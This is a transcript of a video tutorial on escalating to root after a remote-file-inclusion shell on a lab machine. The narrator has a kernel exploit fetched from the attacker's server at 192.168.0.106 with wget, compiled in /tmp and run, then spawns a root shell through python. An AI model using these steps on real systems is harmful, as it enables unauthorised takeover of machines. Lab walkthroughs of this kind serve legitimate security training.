Hey guys, welcome to Router. Welcome to the second part of remote file inclusion. If you haven't seen the first part, you can go here and check out the first part. So the first part, we used remote file inclusion technique vulnerability to get this shell here, and now we will use an exploit to escalate root privileges. Okay, so for that you can go to uname r. So you can see then this Linux, this is the version of the Linux kernel which is running in this vulnerable machine. So if we can go and search exploit Linux, sorry, okay, copy and paste it here. Oh, sorry, so it might be 2632. okay, so there are many many exploits available here. I'm not gonna go into that. I already have an exploit and I will give you the download link, okay, which will escalate local privileges. But the question is how we can exploit it inside our machine, right? That's the question right there. So we can go to cd.tmp. Now tmp or temporary folder or directory is such a directory that you can use as you wish. You can make a directory right here, you can delete things, you can add things, whatever you want you can do in this temporary directory. Okay, so we will use that power, or should I say we will abuse that power to gain a root privilege. Okay, so for that we already have Apache 2 running on our system, so that we can transfer our exploit to the vulnerable machine. So let me show you service Apache 2 status. Okay, sorry, that was my classical mistake. So you can see it's active and it's running. Okay, so now we just need to put this this exploit.c. we need to put it in the home directory of Apache 2 server, which is in var www.html, and then we're gonna copy it and I'm gonna paste it here. Okay, now we are going to transfer this file to the vulnerable machine. How we're gonna do it? We're gonna use wget command. So wget http the attacker's IP address, which is in my case 192.168.0.106, and you don't have to provide the port because the default port is always 80 and the Apache 2 server always runs on 80 port. Okay, so try every time when you try to different networking service on your machine, try to avoid 80 port because it's really it get confused. Okay, so like I am running netcat on port 1234, I can run again SSH port on 80 whatever I want, but I always avoid 80 port because whenever I run Apache on the background, it always go for the 80 port. Okay, so you don't need to provide a port here, you just need to put but if the port is something other than 80 port, then you need to provide the port like this 8080 or 4444 or whatever you set the port by the time of setting up Apache 2. Okay, so x.c. okay, and as you can see the x.c has been saved. Okay, so we go there ls la, and as you can see the laxc port, that the x.c exploit has been saved in the temporary file. Now we need to this is a C file, so by default you cannot run it like you can run the Python or Perl or Ruby. You need to compile it. So for compiling gcc, so x.c and out, and a binary file, whatever this you can name it to. For my case I will name it to router R003R. You can name it whatever you want, the binary file. Okay, LSLA. So you can see there is a router file here. Now you can execute it. Let's see, it's a binary file, so router T3R. Okay, voila, and as you can see we got root. Okay, so you can further make this a proper root shell, like go to again CTFs and abusing the Python command like this, like the sudo python cbin bash. Okay, copy and paste it here. As you can see, we are inside the machine and we got a port root right here. So now you got the root privilege and you can go anywhere you want. You can this system is totally yours, and you can use whatever you want. Okay, so this is how you escalate privileges, and this is one of the many techniques, and there are other. I'm gonna post another video of lots of other videos on privilege escalation. So for that, stick to my channel, and if you like the video, like it. If you love the technique, and if you learn anything, then subscribe my channel. Okay, thank you guys, bye and take care.